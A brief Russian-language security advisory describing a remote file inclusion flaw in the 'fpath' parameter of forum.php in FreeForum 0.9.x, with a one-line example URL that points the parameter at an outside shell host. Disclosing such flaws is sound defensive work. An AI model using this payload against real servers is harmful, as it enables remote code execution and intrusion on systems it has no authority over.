Программа: FreeForum 0.9.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки проверки входных данных в параметре «fpath” сценарием forum.php.
Пример:
http://www.example.com/forum.php?cfg_file=1&fpath=http://sh3LL?
